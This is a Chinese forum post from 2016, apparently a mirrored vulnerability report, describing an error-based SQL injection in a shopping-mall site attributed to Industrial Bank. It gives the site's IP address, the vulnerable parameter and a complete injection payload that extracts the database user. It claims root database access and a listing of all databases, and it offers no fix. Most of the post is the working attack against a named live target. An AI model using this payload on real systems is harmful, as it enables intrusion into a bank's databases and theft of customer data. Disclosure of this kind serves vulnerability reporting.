HanDs
NO.2

[7月漏洞公开] 兴业银行某重要站点SQL注入(ROOT权限) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

详细说明:

目标:兴业银行生活商城http://115.28.28.109/

检测发现以下地方存在SQL注入:(注入参数name,报错注入)

code 区域
http://115.28.28.109/api/ad.php?id=12&catid=&name=



Payload:

code 区域
http://115.28.28.109/api/ad.php?id=12&catid=&name=' AND (SELECT 4107 FROM(SELECT COUNT(*),CONCAT(0x716b7a6a71,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,54)),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kCXG' LIKE 'kCXG

漏洞证明:

1、当前数据库用户,root

user.jpg



2、所有数据库

db.jpg



银行系统,具体就不深入了~

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
兴业
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组